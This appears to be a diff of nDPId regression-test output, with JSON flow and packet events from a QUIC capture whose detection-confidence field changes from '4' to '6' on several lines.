+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370796,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1621431431363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431431363,"pkt":"AAAAAAAAAAEA737VCABFAAViT5FAAH4R4cKokEAFLeSvve3gAbsFTo4zzv8AAB0IdJfsHA8rg\/UANwBZgvMHq3AV4dyxbh1M7qxYXz\/QqdNTBH1HN0CS98tw5ggQc1OjegApOEUGthGeOLQM+rNmjRhE\/clLK4HuBl1LUEre0au1gZTt1KqH6IUxZKrE2sGM+Fqy7i7mdjukue2Wu9obDV8t84mfBGQvFDIc4C1GtNO91WWUABZgT7OXtAGbDvKSc6M0BxmN8Ta9If00OJSKfKhlAsrhpMyMxJleFReMHQ4vg3EHhEg3\/NEef0p7Zb8BSIABFdcX93ZJbQwy+tHFaBeQPW5hn0M6xbNjf\/RY8iKGm7C2EQaLG\/adPJ1obLE57u5xg+UA+iXg0DYCJwxxRWfvhsQNGcUILv1KPQmWIddwcM+oBfVZ7KRAyWk+0AiZGEtw5sCcIbEGLLWCyvoCaVrzFwX4Kxz3c7epqJFIX\/G4r4+8H23LqwgKdJlZseYuGRd9WZ17cAlMwRxkcaXk6EXP9kebqJHJ3dsOkzIicKHPAuN+sTLUfuCH9AK8a\/4BqLh0qhEbE4oM2O7m0ZqtxPFpAd5AdDOcmU0hU21c5xII4eHDJKcgQfeUv8B8IfJzEDaXWMwoJj4d4vPmcte8bu\/qmXZ1s8mPqlbPtjg8e7kqLmBzoI9FINBrXqlwZ15IYu8U9PmD0+zaeALYJjz54xNHN5vMvsd1bG1xBVwnOw1yRR07LgIALUvx1jSrXJCtvK9x3n0e17\/4XbEbU23L0VEkeWuLpyKfzxELjZtRJEtpFPK65Oka98APYQk+cvApo4Lv78agQ4isgrdWL\/lPZZz4e1uzhC0FBRUgyvNQPK2FuPLSh6vnlitflvFrugGvGJPfCcZvXgSXYhz6PyAu6ucrDkSDkrlCeDqiNpAW9DPw533VK1F2HoCn3U9TSSojbSvKUhD5pkbtLeWikk9yO3bArlheE4cXpsDpxzpKyb+b625k3E3BKOMUug6yBthPhhd+KYT9k7QNv49jm145a6LOpftpBseU6YgEk3IkEn1kE0Ry+7JgvD+e7\/hPh4fTdkqT4\/TjJBDL\/5cc4C745utJS\/GXQLmxqClZo8OaKh+kXsNsf3UBWFfLD7KYYITUazzjm4HTDJx22SBXRiSymUZaCiqENZ+uQsLGTRXM6uMxohZt8R\/IQ8G0EqRIa+L34Shdk3NM4sny6iPaT2GH9XAJHyLYemSXNtIrflbXIk7DcAe9WoEKXLafhV1Jrt2VExW1lKiX3NE7AAcMr2YnXBca+0F0\/6iDygHo5jrguhUsl0G\/7cLdUv8CGCYL3MesNJjj71hJsM+4d2agB4IWoE5R19rtfLA1vtKIDOXTGa2fzqMjyQoe+YW5HTBVmgNVSkZf8TM5SDI0XzGDjmd5nIpY2o3rBWBv9s6WzH2rmNVqIh7TJUJMAcpiwJjtgJzrS5Df5gmwZJz6ADwyaSKk2RZlhl7rdxydk46DIs+UU5sl+oKmvzr\/a0f+puDT8Pqc5OFZU4lQ5MXrn49YDCk9QPkWSlDYRK1UI4nr4NWKo\/\/Pw\/UFfpF9RnncBRyUFvONCCgRjmgmTi97CEEwbbxu\/Ki8qbPdIDbhcLsKaHhiFtKjKD0dMVkAfS16egEUxcfuMtmT8\/+LcTgqwwjg\/mITmoaavzef\/yGP6uX9jutL\/g3miLPjpmyK5Acy3dJwCKXrUWYFg70tEZ670oPo3w3+vZPuxYO7UtMA2cZA7eta5PXcPaU8MOYnga\/iqCsWqSwZ05kCD8++07rRI1TOxvKxLmRo5hLgAqZ\/VaeBFZ3vrlfLivk6N9hE4WT2M2RUIs7n"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1621431465588,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431465588,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFOJAAH4RYRqokEAFgPgYAeyHAbsFTuuvwP8AAB0IU7\/qR9hybwkANwBhzZIZzXuLO+ITUxwPQ154KDm4YAA5umLfVFm+RmcLUYDlEBA\/pAz6nvB8AVSCdTXI5TOYsV9E\/QWBFKCDCIBHTHvFyIcz+i9HnhzJx3oomex6fz89Wv0t4v5XCsZ2gtXaLihep1Q6RHSn816q6Kh40Jb6q21pIvxBT+cRUyfL9XQqtwbCmih\/1k+KHNhNh+kRFh6XJbGZqdVuNiBplHu6zJ0pkshr1pvC1LJhyvQU0Dm4mWPTqJuQqwLB7hjY60vKpAGHvyyOczQWN09erIQDzXbzqMhL4b0M2w1\/TlT7huuQTxEID3j5k9KaYjz6kf0ER1JcH8cEnZSpU6ZDcA0aKtSUCRbfGucvzpXAlU1P0gD13ZbHqKxSYrqnpXGcTVwS3I9+c5Q\/VkUgvsZc0wf\/9MEOjlcithT92XYA7xmlU0UfwPd4Ojf1wNxPgSU\/K0DnDk1womS0G\/ZSh9D9ZlZVB5yVA13pIiaR+k8r1X82fdroTGzdHugbU8o3fbaRyQm8b4yRtnFzF0LxEo7PtOJzdm0ZBLoje+ZNNqh9NFtJ9V1qQS1X9VNOsUZvWPNgQBaeyZndWXpgl15MvPmte+qN9awZ8E\/Y3bjdMYO04PR3TnIuFN08oA49CYA1VctJp7\/dE8aTfiUzEHQg2lRh\/vprMm4FsAuocyWHNetPgpGS\/nW\/ajz3nUWrWpr4p5iU3XvWC1ReAGuIIwesUqSmu427nLGiB1ay7OxzNWba7FJKEY4XyQMczhEntYCEKh4B2jDrKe9HHMi65qX0Oh6pF0JJHBGwEfsMrAVsySYaPZfJk7O3QMH6jwaf2H8zG51QPhsVfJebD1eM82cCAiKz3k4AxeP1Mp2XyoYtWJntK6nrkhq29ZSo8N9IF25Bx4cyZQ1gWgsf6YOucgt1DYomgaAz5sN1VRPs3lKuTuJk+9CmvbZws8Lrl5pNQluKA7HS6J5r6Sdko6sMJa32MLYdskh\/eWjyAO4PIU0DLNnI9urDc90Tl7DeKVFUDKd5Ccw06SjbQZXaBeFclUY6Rq7ktvqS4xNkU42wPXNNkc+Km0VcpWL5mTb8raM3lJS9QkTtvIQ+D3CxIQKxNN71qsRBMGUoIaCSVO44MLEyhaXL++UAl6veMNbMWNzpyGl2ZAQaiMg3gh88e\/KjyFDhVelq57ttuwxfYY4HdAvf1O7Wm2niYjEYy3EGd+XJh75LEv2J7OvkX\/TDKMoDPHZBKylGhceTFClV6SwJCqHbmFRPRljZRudE8DcvLMdi2ArGtC7wV6BJuPxvznknqIpsuPaaUACqFh132DMk+VymlGGrHAEvcCDBXHcv+s986i6aYzFj3+UG25eWMpILHj80J8I1qvmexhdgAH0\/xq6OcVC+CWTvOrw2ojyebhvuLWQwJTRfXumFCZVnkVXMY\/wBcky+Zey4VYpd2tteRlcYmo0gstMZmuJQkyXGMQDd6DmMt+xSCBKdq2pU3+cJZWcSDy+PS90fcIm9NFtg1W76+\/3yU3UvgIkGb2htcHHuLcboGe6WFdcvOvn66fYN1q99qa+mvjvMLlrlsqtu4oszePWHk3JUyZ0uzuBriY6ZOViLOu9+ngcuDNQPDEI8BMfCUASLWFyzVNOtTnOzlD21\/UqlSPBUT+FMnLB8yDq8q7wJuDMTSdqKQ5\/2g+\/gT1sPzVcQn8bdHpPg21YclHOSozdRTvS2OQZHZHwOsQ3Q8D0cWDoLqYrm7VvgO2SJgZmoD+0O+6Mg5gIxvYEyW63O7uwaFAXSn6cSWSij"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431465588,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1621431482942,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431482942,"pkt":"AAAAAAAAAAEATej1CABFAAVioMVAAH4RjguokEAFsVYuztyoAbsFTmeUz\/8AAB0IyBHAZ\/KzP6sANwD5gA3If0Iup4ZIgtnchwt9ocBVPoi0jazUzZX7baSHnp2+ZpfaMjYJtsimLMd7snuHAP5qKMdE\/QlWzMm9QjekYI5DKIp3Vs2bgEYSzsPRJHJKk+aezBC58a0+UE3a4VvidK0X7rVv7FFtJ\/MlZ0l7eyLpQagPrjcoOKGABkLRMC8f8c7JiV+3vMxbVMzswL0F0LHGpOF6tJmgxxG3+uIP4la3w9aqL9EIveC4NT3J3l\/d0v30cvaNQdKp9qrKAtUZ3b8p5FSbz95HiJcYx1aCRH8HEjdQWEZtyOX1SVZcoQkIfAis2hQqjHVzbGHJilsHstK+d\/yh1vND+cvzFLHGQ69Qa22CEae79RChQnTrK2ZCkxDnMfq1REzR81Vvo7\/ll3OtbcsHwGPv90oLgV5z+gQBcGSsn+txIgajW5\/OHfM0j4G0dOYCsFP1nOlqm4KZEyRojk5FD9gkh+QOWzUWMY5A1pCDVEbH98Ij7MdFXOII4eyOGrKjZzB3mOY4L3c23aLspNnA\/xDDGoLwBtxo8tuS0zMN0N7GirfEc+UfpigoL4GN63\/LWtTXGeRupY0hNf1HQSb5VrjXblNspzeSPkwLA3aJ5esrWE6xSGdL6JZ5WypP8xT64XLmr0Zb60RDfQA5rRVy5Slfvqsy9gpQwpIPi8FWy85za9+wqZmlViFlX2epvHU\/FjVYv3WNuP8SbX3Uhu84jX8xNIyRWWdBxFeFE\/86cZtOr\/Y3X4PqG7sr0JWY\/fMaNEX7\/wyGWZ4GThmJ5+cXL+EYkRu6GhEEZrNAi+9kCVttLBMUDHxs8XD83alhSam2NBHXrH3qgMFg4wem33ZjfiDKFbwU8lzTj0R5jphur9\/TMii0ZE4o\/tWuxXum9FphC9lsiHff\/LoE+tpkkEGSJvfUkY+42PUd+iyulKfdSSlb2w3ICSW982gZX8yqFnIWdMtFMt7VtGfDY6b2g\/VctCi7tH4bfPeCfOSltFtkJj87\/U\/kUi9e1b26oCdt5Xk6wLRo21LJgccFK7EgeSfdK8uEGdrc\/u9CQqoxHZNC0NFUmmKcp\/1jZCF0P3DcN0ewbtKhnRxAjSNjtkYP74ShEvo3ktBV+nVpNskRYreit0gbPCwlbV4PLZXs3NS2DwC1zjsxp6Hv+nM3Q3t+CbogIe1A48l1yD1WlnX7Siynac+mrBcCDB7xdiQozuRnqhIinTfzuyAJM7Da8bFtM4zKsUHWfXAlicU5hdqlIJ6QkyRLm3x+ut5L5m62Q2VfTWbqDNHIYAnHPUo+TuglzAH0cDKH4SYvskX8XBUvmGvLHZZLJKUBhOxd87nESRICfrgx6G3GmLH92u34bDky8P6str3vYXizffmDVn1fnpnNyetYdgDy1+qT4TCFCyOkA8eJxH04nS1cwuyXOClUl4xACm9FU4jJJg92Pyie1LF9nZIEvD+s8U296VtKerW0URPmgRjvHP723Xg+xd+1t2dLLFXB6dee9it85SO3nA37lV1L1ODC1xoDUthLzBuJjMX32C9IytuXhyyPcrHeaPjq4gDH3rx9QhfkdaaErk1SnrXw0GjVVxKPC1H0G8BIzVuCJzL6ifqHzHtQpmqGWkB1dkKDilpNyCRwBtJL1lOHBAp\/WGH4+IC4wpPGe9o5k38RrL8SgNobFDQ7d4KUVI\/R6UNBDzFLkmCpffORWC9LBKt3SKQtPDoJw4\/zzDEridhd8NKA22XDC0i6N8sevkZDtKuiWYpfGInjxye\/dACo5mlltAELaIWcGHUxsmgi"} -00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621431301735,"flow_last_seen":1621431301808,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621431301735,"flow_last_seen":1621431301808,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431482942,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1621431520499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431520499,"pkt":"AAAAAAAAAAEAU0VlCABFAAViMyFAAH4RJiSokEAFmWIcTsABAbsFToP3zf8AAB0I8UfMm0YCumkAAEU0qB108owToXTtuCRjc+70inAihifYHiWbQuXfJea7VaHoD1Z3r4\/vBhoSdhxMdibKvoSajiWd+GKpZIpSe6Mu3b02WuJTQZ7lIlxB6R8387TPpWvfdvZCcexYSs5w06Q1KSKSldCKb13732QiDhmceyuJ+G\/vOPKCn4lhROVQeWtYaKBdyapYqZHfhjZWjljHpjVo2vNz+VkBflOX+Ozm6T\/87Vc5UeUm3B37gfSZ4LeIx7NevaSMxGXLmBBGm53OH67qMQ24dCiLmx1nIEP2GSXUuuxzvdiYJ+C33xdZKaEr6jhIjm7VN1\/Zu8CjfkKQf7D8e9dFZtoH9YVFCLq08e8yFNdGIgBhWD1FTAmwmExuDbbN8chYJX2X\/1hfjPMXADpNHptZq24MTx4Ub2WVKMWLSPtjykME1uGVH48mFoWytx02J11gW\/ap3AsmyZ9NdEW7Cunzb7OdwAsLm5eBcsvVYsBASXkXW3J41zJ4fFwc7gDX94tPUT2MihCUm3spqjn8qePvRLkJUMDo\/SAAm5dZcaQtVMRqKRQyJK3obHEqKv8SvkNiEUp6IvmaXKJzaHAMKbNjzuPBN5APMlSrVhrdjOoWnxltOAScvKXxSntCksumIK1eZRzMyHmhY2Zkz\/cbLMG+nbi739ExhDy7kfNZcN1w7DL8T3NA2lau5y0gmwx2J+etKbkof1MTLgLIWQjaMgJ3Yg5iRbSia+X7UmijUvf0oRg1VUpzVMKvybapDiUxy7TKrPFHlmnAdWt7EbvCGo4ZOvDt9jNsJ3ry3qsfnRRTY0KCXoq9KBhKDVmNwRT0CfKMZF9UZyQR8waEK3M2khCNE8K0HtopUIBaei2pkSAkP0cWMAQzYQoAL9RPKGIb2zxA2FTLXUCeYjqOz5YFjo\/YUbPspSIkamI5Uqoz3HxLcyaZT1IlDi3snj703Pl1raa5uPYB9SbeFS3jz22i+jMB1jK64ocdk\/Ap04WGAZSylA0JvWsYxDreLK4icj5p\/lle+733epQE+WSvjvH3tpEFuFmbvfaXn1HUnxAw3Znts4em7rmRTGyYtwIh8Xo3qzYWxNp\/\/277cZjRt9QzcMt6pSHqe\/yM04MKoyEXtKFSOMDWukBJqjkH4ISeeqHmQ0D2O3e10r1RYA0qfHiQCpBrjUzeDJ5xQe6BIM9EKqojRuTs\/9mFZHxEdvsWM0nr40pxU4fyO6RlV7bvX6gjlu6xDeyImfTBJ1CrhxkM0NIOLgBByqIu1vkvl+ToqkPCKb8lpAmBCSOuL8LVtqnQvcqcllj+MkGi4em4vqlh9wF35mSy9bZRKUfyGp+cvVqboEHj5rnD\/784KqHiRDHIGgaFgNoSsGakObjU1Rp9zwOiAfj+k7Rb9uzcZoWDO5B2gL8j4OXSBSVhkAirs3N86IOumv\/3IoeWBTvvkpNELfLJuEh70vkySKCdBxM0hwVEaMSCru3BXwqtfPMH1QJ4jHNqxDAuEHki1cwAcJhlCh9Wp3ET7xqPW7AeUxwE9fN3Jod8qufi8Ujiy3wnc8\/qOYbxiPpALR0F1dCk1cwWv9kpGmhEZ6eBwn6kYxBWDq0P1zZ7tjZHsfRLSAnN8M937kF16B4WONO3kFuMiJaE8dalwqulOnHsnWLkMT4dr795Qeky6SKp5+YFHGV+5ALzCSXCENO4JxTGck3fzNG3n\/Cx2j6bb0QI1wP3YfxO0Zb0Z81wO59qyyo3YabxIs6ynT60zY7ne50FIpDZulJ5HZlhqxpkr0W\/k06atJOkV0Ej"} -00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431520499,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 